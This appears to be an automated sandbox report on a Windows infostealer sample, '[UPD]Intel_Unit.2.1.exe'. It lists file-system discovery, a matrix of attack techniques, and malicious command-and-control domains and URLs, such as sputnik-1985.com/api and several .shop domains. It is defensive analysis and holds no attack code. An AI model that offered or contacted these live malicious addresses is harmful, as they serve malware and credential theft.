                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: Yara matchFile source: 0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Hugo.com PID: 6596, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Hugo.com PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F92263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_00F92263
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F91C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,13_2_00F91C61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol41
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)2
                Valid Accounts
                2
                Obfuscated Files or Information
                Security Account Manager13
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS37
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection
                111
                Masquerading
                LSA Secrets341
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Valid Accounts
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                [UPD]Intel_Unit.2.1.exe5%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com0%ReversingLabs
                No Antivirus matches
                SourceDetectionScannerLabelLink
                noisycuttej.shop100%URL Reputationmalware
                framekgirus.shop100%URL Reputationmalware
                rabidcowse.shop100%URL Reputationmalware
                wholersorie.shop100%URL Reputationmalware
                tirepublicerj.shop100%URL Reputationmalware
                SourceDetectionScannerLabelLink
                https://sputnik-1985.com/i~100%Avira URL Cloudmalware
                https://sputnik-1985.com/api100%Avira URL Cloudmalware
                https://sputnik-1985.com/LOX100%Avira URL Cloudmalware
                https://sputnik-1985.com/r100%Avira URL Cloudmalware
                https://sputnik-1985.com:443/apial100%Avira URL Cloudmalware
                https://sputnik-1985.com/Site100%Avira URL Cloudmalware
                https://sputnik-1985.com/t100%Avira URL Cloudmalware
                lastlossunbag.click100%Avira URL Cloudmalware
                https://sputnik-1985.com/api0100%Avira URL Cloudmalware
                https://community.fastl0%Avira URL Cloudsafe
                https://sputnik-1985.com/apila100%Avira URL Cloudmalware
                https://sputnik-1985.com/apij100%Avira URL Cloudmalware
                https://sputnik-1985.com/apijhhCf100%Avira URL Cloudmalware
                https://lastlossunbag.click/api100%Avira URL Cloudmalware
                https://sputnik-1985.com/100%Avira URL Cloudmalware
                https://sputnik-1985.com/a100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                104.102.49.254
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    sputnik-1985.com
                    104.21.64.1
                    truefalse
                      high
                      lastlossunbag.click
                      unknown
                      unknowntrue
                        unknown
                        cloudewahsj.shop
                        unknown
                        unknownfalse
                          high
                          noisycuttej.shop
                          unknown
                          unknowntrue
                          • 100%, URL Reputation
                          unknown
                          nearycrepso.shop
                          unknown
                          unknownfalse
                            high
                            framekgirus.shop
                            unknown
                            unknowntrue
                            • 100%, URL Reputation
                            unknown
                            rabidcowse.shop
                            unknown
                            unknowntrue
                            • 100%, URL Reputation
                            unknown
                            wholersorie.shop
                            unknown
                            unknowntrue
                            • 100%, URL Reputation
                            unknown
                            tirepublicerj.shop
                            unknown
                            unknowntrue
                            • 100%, URL Reputation
                            unknown
                            EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKyg
                            unknown
                            unknowntrue
                              unknown
                              abruptyopsn.shop
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                lastlossunbag.clicktrue
                                • Avira URL Cloud: malware
                                unknown
                                https://sputnik-1985.com/apitrue
                                • Avira URL Cloud: malware
                                unknown
                                https://steamcommunity.com/profiles/76561199724331900false
                                  high
                                  rabidcowse.shopfalse
                                    high
                                    wholersorie.shopfalse
                                      high
                                      cloudewahsj.shopfalse
                                        high
                                        noisycuttej.shopfalse
                                          high
                                          nearycrepso.shopfalse
                                            high
                                            framekgirus.shopfalse
                                              high
                                              tirepublicerj.shopfalse
                                                high
                                                abruptyopsn.shopfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://steamcommunity.com/my/wishlist/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/chrome_newtabHugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.entrust.net03[UPD]Intel_Unit.2.1.exefalse
                                                            high
                                                            https://steamcommunity.com/?subsection=broadcastsHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ocsp.entrust.net02[UPD]Intel_Unit.2.1.exefalse
                                                                high
                                                                https://help.steampowered.com/en/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/market/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://store.steampowered.com/news/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://store.steampowered.com/subscriber_agreement/Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgHugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.autoitscript.com/autoit3/Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.drfalse
                                                                              high
                                                                              https://sputnik-1985.com/rHugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://sputnik-1985.com/tHugo.com, 0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://steamcommunity.com/discussions/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://sputnik-1985.com/api0Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://store.steampowered.com/stats/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://sputnik-1985.com:443/apialHugo.com, 0000000D.00000002.2765602935.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://x1.c.lencr.org/0Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://x1.i.lencr.org/0Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.entrust.net/ts1ca.crl0[UPD]Intel_Unit.2.1.exefalse
                                                                                                    high
                                                                                                    https://sputnik-1985.com/SiteHugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    https://steamcommunity.com/workshop/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.mozilla.org/products/firefoxgro.allHugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://store.steampowered.com/legal/Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastlHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.mozilla.orHugo.com, 0000000D.00000003.2717558680.00000000049F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://sputnik-1985.com/LOXHugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://sputnik-1985.com/i~Hugo.com, 0000000D.00000002.2765479156.0000000001A35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoHugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.entrust.net/rpa03[UPD]Intel_Unit.2.1.exefalse
                                                                                                                          high
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://store.steampowered.com/privacy_agreement/Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/points/shop/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://aia.entrust.net/ts1-chain256.cer01[UPD]Intel_Unit.2.1.exefalse
                                                                                                                                  high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.autoitscript.com/autoit3/XHugo.com, 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmp, Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Enlarge.9.dr, Hugo.com.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://sputnik-1985.com/apilaHugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        unknown
                                                                                                                                        https://store.steampowered.com/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=eHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://ocsp.rootca1.amazontrust.com0:Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://nsis.sf.net/NSIS_ErrorError[UPD]Intel_Unit.2.1.exefalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://sputnik-1985.com/apijHugo.com, 0000000D.00000002.2765627357.0000000001A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://www.ecosia.org/newtab/Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://lastlossunbag.click/apiHugo.com, 0000000D.00000002.2765602935.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://sputnik-1985.com/Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://ac.ecosia.org/autocomplete?q=Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://sputnik-1985.com/aHugo.com, 0000000D.00000003.2717609537.0000000001B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://sputnik-1985.com/apijhhCfHugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    unknown
                                                                                                                                                                    https://steamcommunity.com/profiles/7656119972433190Hugo.com, 0000000D.00000002.2765946345.0000000004880000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://store.steampowered.com/account/cookiepreferences/Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastlyHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://steamcommunity.com/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://crl.entrust.net/2048ca.crl0[UPD]Intel_Unit.2.1.exefalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81Hugo.com, 0000000D.00000002.2765946345.0000000004880000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.entrust.net/rpa0[UPD]Intel_Unit.2.1.exefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/about/Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;lHugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                        104.102.49.254
                                                                                                                                                                                        steamcommunity.comUnited States
                                                                                                                                                                                        16625AKAMAI-ASUSfalse
                                                                                                                                                                                        104.21.64.1
                                                                                                                                                                                        sputnik-1985.comUnited States
                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                        Analysis ID:1585387
                                                                                                                                                                                        Start date and time:2025-01-07 15:44:08 +01:00
                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                        Overall analysis duration:0h 6m 28s
                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                        Report type:full
                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                        Number of analysed new started processes analysed:19
                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                        Technologies:
                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                        Sample name:[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@26/21@12/2
                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                        • Number of executed functions: 84
                                                                                                                                                                                        • Number of non-executed functions: 292
                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 20.12.23.50
                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
